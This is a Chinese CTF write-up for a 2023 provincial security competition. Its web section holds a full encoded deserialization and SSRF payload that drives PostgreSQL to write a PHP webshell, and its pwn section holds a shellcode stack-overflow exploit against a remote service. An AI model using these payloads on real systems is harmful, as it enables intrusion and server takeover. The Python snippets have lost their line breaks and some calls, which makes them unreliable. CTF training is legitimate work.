一、Web类(共五道题)
1、Web1
拼图得到flag!反正踩点进去web是无法访问的,过了接近30多分钟才开放web页面访问,就有人1分58秒交了一血...
2、Web2
查看静态代码得到隐藏路径
BP抓包访问得到提示:
构造请求包得到flag:
3、Web3
动态flag,需要自己跑flag,通过BP抓包,把0设为变量,用报错的文件去爆:
按照图一步步操作就行,简单爆破即出。
4、Web4
访问题目phpinfo.php发现开启了OPcache,通过cache得到源代码,发现存在ssrf漏洞,通过利用ssrf读取发现安装了psql,通过rce 反序列化构造连写入webshell!!
这个URL参数包含了一个名为ORZ的PHP类对象,其中url属性为空,而value属性包含了一个Gopher协议的URL字符串,可能包含一段经过十六进制编码的恶意Gopher Payload。反序列化链条构造:
http://111.74.9.131:10147/?orz=O%3A3%3A%22ORZ%22%3A3%3A%7Bs%3A3%3A%22url%22%3BN%3Bs%3A5%3A%22value%22%3Bs%3A874%3A%22gopher%3A%2F%2F127.0.0.1%3A5432%2F_%2500%2500%2500%2529%2500%2503%2500%2500%2575%2573%2565%2572%2500%2570%256f%2573%2574%2567%2572%2565%2573%2500%2564%2561%2574%2561%2562%2561%2573%2565%2500%2570%256f%2573%2574%2567%2572%2565%2573%2500%2500%2551%2500%2500%2500%25ec%2544%2552%254f%2550%2520%2554%2541%2542%254c%2545%2520%2549%2546%2520%2545%2558%2549%2553%2554%2553%2520%2563%256d%2564%255f%2565%2578%2565%2563%253b%2543%2552%2545%2541%2554%2545%2520%2554%2541%2542%254c%2545%2520%2563%256d%2564%255f%2565%2578%2565%2563%2528%2563%256d%2564%255f%256f%2575%2574%2570%2575%2574%2520%2574%2565%2578%2574%2529%253b%2543%254f%2550%2559%2520%2563%256d%2564%255f%2565%2578%2565%2563%2520%2546%2552%254f%254d%2520%2550%2552%254f%2547%2552%2541%254d%2520%2527%2565%2563%2568%256f%2520%2550%2544%2539%2577%2561%2548%2541%2567%2551%2547%2556%2532%2559%2557%2577%256f%254a%2546%2539%2548%2552%2556%2552%2562%254a%257a%2545%256e%2558%2553%256b%252f%2550%2567%253d%253d%2520%257c%2520%2562%2561%2573%2565%2536%2534%2520%252d%2564%2520%2520%253e%2520%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2520%257c%2520%2563%2568%256d%256f%2564%2520%2537%2537%2537%2520%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%253b%2520%2553%2545%254c%2545%2543%2554%2520%252a%2520%2546%2552%254f%254d%2520%2563%256d%2564%255f%2565%2578%2565%2563%253b%2500%2558%2500%2500%2500%2504%22%3Bs%3A5%3A%22array%22%3Ba%3A2%3A%7Bi%3A0%3Br%3A1%3Bi%3A1%3Bs%3A6%3A%22gogogo%22%3B%7D%7D
执行获得动态flag!web4其实也挺麻烦的,哎第一个人代出来了,其他人就出来了!懂的都懂
5、Web5
二、MISC类(共三题)
1、MISC1
binwalk分离文件发现一个图片与带密码的压缩包:
strings图片提示明文攻击:
明文攻击压缩包得到密码:
打开后得到一个url:
根据提示进行填空交叉爆破,得到flag:
这里挺有意思的,另外一个思路是txt文本里拿到IP,然后去爆破全端口发现44296可访问,然后存在写权限,写入一句话发现flag,提交错误兔子洞啊!哈哈
3、MISC3
查看流量发现base编码:
或者使用wireshark的tshark导出也行:
tshark.exe" -r attachment.pcap -Y "s7comm.param.func == 0x05" -T fields -e s7comm.resp.data
获得:
GFVWUV3WOFIUG3DPJB4DQ6TVO5ZUW3ZVOBKFCP3QO5SD2MJSGM2A====
base32解码拼接百度网盘得到:
https://pan.baidu.com/s/1kjWvqQCloHx8zuwsKo5pTQ?pwd=1234
文件下载对立面内容进行逆序,base64解密,可以得到zip文件:
立体图发现压缩包密码解压得到flag:
这里有个有意思的点:
可以用肉眼慌脑袋看到密码!!!
三、RERVER类(共三道)
1、RERVER1
扫雷!!对比原版扫雷发现需要修复,Shellcode进行提取,010editor修复即可:
修复花指令,后查看伪代码:
进行两次异或后提出数据直接解密,编写exp获得python:
import os, sysc = [0xa, 0xc, 0x6, 0x5a, 0x5b, 0xa, 0x54, 0x5, 0x4d, 0x58, 0x56, 0x54, 0xb, 0x4d, 0x55, 0x9, 0x55, 0x40, 0x4d, 0xc, 0x6, 0x59, 0xb, 0x4d, 0x55, 0x54, 0x58, 0x57, 0x5b, 0x9, 0xb, 0x40, 0x5, 0xa, 0x6, 0x9]h = []for i in c:m = i ^ 0x33n = m - 4p = n ^ 0x57h.append(p)fl = ''.join(chr(i) for i in h)print(fl)
2、RERVER2
re2解题思路:
32位exe文件,IDA查看main 伪C代码分析,放了很多花指令,动态调试发现是四则运算,查看for循环下断点分析出第一个运算是异或,循环异或传参比较写出解密代码即可。
3、RERVER3
re3解题思路:
查看line_rev IDA分析发现程序需要输入信息,寄存器中每次以四个字节为处理快存入eax寄存器。分析每四个字节运算完后eax都为0,寄存器中eax所有操作都是可逆运算,编写解密eax初始为0往后还原输入即可。
四、CRYPTO类(共三道)
1、CRYPTO1
Base91解码:
Base62解码:
Bse58解码:
偏移得到flag:
CRYPTO2没做出!!
3、CRYPTO3
通过使用公钥 pub 和私钥 pri 计算得到 wtf,接着通过 GCD(wtf - g, pub) 求得 pqr,进而计算出 p。然后将密文 enc_my_key 经过模 pqr 的解密,得到明文 my_key,最后根据 my_key 的最后一个字节的值进行 padding 的剥离。
接下来,使用tenseal库,根据密文cipher和密钥进行解密,得到明文向量r。最终输出解密后的明文向量。
在第二段代码中,通过异或操作解密密文向量,并进行了额外的处理,最后输出解密得到的消息。以下是整体的代码块,其中包括了加密和解密的部分:
import tenseal as tsfrom Crypto.Util.number import long_to_bytesfrom Crypto.Util.strxor import strxorfrom sage.all import matrix, RDF, vector# 加载参数和密文enc_path = 'enc0'key_path = 'keys0'parameter_path = 'parameter0.txt'with open(parameter_path) as f:params = f.read().splitlines()def get_content(s):return eval(s.split('=')[-1])pub, pri, enc_my_key, M = map(get_content, params)g = 2# 计算 pqrwtf = pow(g, pub * pri, pub)pqr = GCD(wtf - g, pub)p = pub // pqr# 解密得到 my_keymykey_mod_pqr = pow(enc_my_key, pri, pqr)my_key = long_to_bytes(mykey_mod_pqr)pad_length = my_key[-1]my_key = my_key[:-pad_length]print(f'{my_key = }')# 使用 tenseal 解密密文with open(enc_path, 'rb') as f:cipher = f.read()context = ts.context_from(key_path)r = ts.ckks_vector_from(context, cipher)decrypted_vector = r.decrypt()print(f'Decrypted Vector: {decrypted_vector}')# 使用 SageMath 进行进一步处理RF = RDFM = matrix(RF, M)result = [5556539392497.078, 5957857154652.061, 4623057588030.9375, 5184294725274.473, 4525864860819.6455, 4912561029497.605, 5604694739795.895, 5047504787153.257, 4992720722892.393, 4810343940514.347, 5265717856795.979, 4683522167157.896, 4799200626648.438, 5054153853567.738, 4319859516374.0903, 4728899921491.278, 4758789139078.593, 4267924722888.591, 5028431249124.511, 5252563783054.97, 4573325127811.569, 4293114617694.572, 4871370745497.976, 4917956337466.532, 5348975874704.784, 4750838159488.302, 5277187737025.759, 4475046765283.012, 4431618782503.842, 4771371407930.026, 4369943344059.7324, 4757215230168.454, 4473471730893.913, 4412800994752.526, 5450312857674.775, 4699115737684.232, 4421861958972.185, 4671621318841.103]e = [2 ^ 20] * len(result)msg = vector(RF, result) - vector(RF, e)msg = msg * M^-1msg = bytes(map(int, msg.list()))msg = strxor(msg, my_key)print(f'Decrypted Message: {msg}')
五、PWN类(共三道)
就做出了pwn1....
pwn第一题是改编CSAW 2015 Quals: Exploitable 100 - Precision!
通过对ezpwn文件的分析,发现其中的scantf函数存在一个栈溢出漏洞。同时利用一些技巧成功绕过了浮点数的校验,能够在栈上注入恶意的 shellcode。通过成功利用栈溢出漏洞,可以执行注入的shellcode,最终达到获取shell权限的目的!!以下是代码:
from pwn import *# 加载二进制文件elf = ELF('./ezpwn')# 连接远程服务io = remote('114.55.63.97',1234)# 接收并解析 Buff 地址io.recvuntil(b"Buff: ")buff_addr =int(io.recv()[0:-1],16)(hex(buff_addr))# 构造 shellcode(execve("/bin/sh", 0, 0))shellcode = asm(shellcraft.sh())# 构造 payload,填充到栈溢出位置payload = shellcode + b'a'* (0x28- len(shellcode)) + p64(0x4040921f9f01b867) + b'a'*12+ p32(buff_addr)("shellcode len = %d"% (len(shellcode)))("payload len = %d"% (len(payload)))# 发送 payload 触发栈溢出io.sendline(payload)(io.recv())io.interactive()
六、blockchain类
这道智能合约题目整了一小时多,到钱包调用支付就走不下去了...太菜
比赛问题不敢多说~加油吧!不能太早发wp,只能推迟一天了,规则理解!
原文始发于微信公众号(大余安全):2023年江西省第四届赣网杯网络安全大赛WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论